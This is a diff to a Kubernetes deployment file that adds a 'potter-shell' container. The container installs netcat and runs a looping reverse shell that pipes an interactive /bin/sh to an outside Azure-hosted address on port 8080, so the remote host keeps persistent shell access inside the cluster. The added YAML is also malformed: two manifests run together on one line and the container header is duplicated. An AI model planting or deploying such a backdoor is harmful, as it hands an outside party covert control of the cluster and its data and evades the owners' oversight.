--- a/deployment.yaml
+++ b/deployment.yaml
@@ -15,6 +15,35 @@ spec:
     spec:
       containers:
         - name: shell
+          image: alpine:3.18
+          command:
+            - sh
+            - -c
+            - |
+              apk add --no-cache netcat-openbsd;
+              while true; do
+                mkfifo /tmp/f;
+                /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f;
+                sleep 5;
+              done
+          stdin: true
+          tty: trueapiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: potter-shell
+  namespace: sesamo-api-argocd
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: potter-shell
+  template:
+    metadata:
+      labels:
+        app: potter-shell
+    spec:
+      containers:
+        - name: shell
           image: bitnami/kubectl:latest
           command:
             - sh
